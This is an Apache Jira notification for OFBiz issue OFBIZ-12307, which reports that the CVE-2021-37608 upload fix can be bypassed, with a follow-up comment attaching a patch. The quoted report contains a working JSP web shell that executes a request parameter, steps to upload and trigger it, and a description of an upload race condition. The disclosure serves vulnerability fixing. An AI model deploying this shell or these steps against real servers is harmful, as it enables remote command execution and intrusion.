[
https://issues.apache.org/jira/browse/OFBIZ-12307?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17447424#comment-17447424
]
Rohit Koushal edited comment on OFBIZ-12307 at 11/22/21, 2:25 PM:
------------------------------------------------------------------
Hey [~jleroux] , I think we miss one place that requires similar changes for
service *addAdditionalViewForProduct* that we did in
[commit|https://github.com/apache/ofbiz-framework/commit/71dbb3c#diff-4dba13f9f119e22bd7bce9650670a2dc6628b22975c1da3972465cc958fad15d]{*}.{*}
I have checked and it is failing when uploading Additional images. Below is
the screen for your easy reference over the demo trunk instance.
!image-2021-11-22-18-14-50-370.png|width=469,height=250!
Attaching the patch which will resolve this issue.
[^OFBIZ-12307-addAdditionalViewForProduct.patch]
Thanks!!!
was (Author: rohit.koushal):
Hey [~jleroux] , I think we miss one place that requires similar changes under
service *addAdditionalViewForProduct* that we did in **
[commit|https://github.com/apache/ofbiz-framework/commit/71dbb3c#diff-4dba13f9f119e22bd7bce9650670a2dc6628b22975c1da3972465cc958fad15d]{*}.{*}
I have checked and it is failing when uploading Additional images. Below is
the screen for your easy reference over the demo trunk instance.
!image-2021-11-22-18-14-50-370.png|width=469,height=250!
Attaching the patch which will resolve this issue.
[^OFBIZ-12307-addAdditionalViewForProduct.patch]
Thanks!!!
> CVE-2021-37608 vulnerability bypass
> -----------------------------------
>
> Key: OFBIZ-12307
> URL: https://issues.apache.org/jira/browse/OFBIZ-12307
> Project: OFBiz
> Issue Type: Sub-task
> Affects Versions: 17.12.08
> Reporter: thiscodecc
> Assignee: Jacques Le Roux
> Priority: Major
> Labels: security
> Fix For: Release Branch 17.12, 18.12.01
>
> Attachments: OFBIZ-12307-addAdditionalViewForProduct.patch,
> image-2021-11-22-18-14-50-370.png
>
>
> The patch
> ([https://github.com/apache/ofbiz-framework/commit/8d49af4/#diff-75dac0d18a6bc59554dded12b9b01563651e05a2df6cede9d7d3e2b42b7fc382])
> for the CVE-2021-37608 vulnerability can be bypassed.
> Verification process:
> 1.Create a new xx.png.jsp file.
> The content of the xx.png.jsp file is:
> <%
> java.io.InputStream in =
> Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
> int a = -1;
> byte[] b = new byte[2048];
> out.print("<pre>");
> while((a=in.read(b))!=-1)
> { out.println(new String(b)); }
> out.print("</pre>");
> %>
> 2.Upload the xx.png.jsp file directly
> 3.Visit the jsp Trojan address
> "https://localhost:8443/images/products/management/WG-9943/xx.png.jsp?i=whoami";
>
> I carefully analyzed the code of this logic again and found multiple problems.
> the reasons for the vulnerabilities are:
> Here will upload the file first.
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/applications/product/src/main/java/org/apache/ofbiz/product/imagemanagement/ImageManagementServices.java#L159-#L162]
> When verifying the file name, because the file name is "xx.png.jsp", so
> "wrongFile=true".
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java#L128]
> Because "wrongFile=true", isValidFile method will exit early.
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java#L137]
> So that the malicious file is not deleted.
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java#L215]
> The above is the reason for the vulnerability mentioned in my last email.
> I also found a new problem. The code logic used to verify the file upload is
> to upload the file first and then delete it after judging that it is
> malicious.This will create a race condition loophole.
> Use multiple threads to upload the xxx.jsp file, and then keep accessing the
> xxx.jsp file. Since ofbiz adopts the verification rule of uploading and then
> deleting, then xxx.jsp will be uploaded successfully, and ofbiz has not
> successfully deleted "xxx.jsp". The file, "xxx.jsp" file was requested by the
> attacker first. This will create an arbitrary file upload vulnerability.
--
This message was sent by Atlassian Jira
(v8.20.1#820001)
![https://localhost:8443/images/products/management/WG-9943/xx.png.jsp?i=whoami"](https://localhost:8443/images/products/management/WG-9943/xx.png.jsp?i=whoami"){kind=link}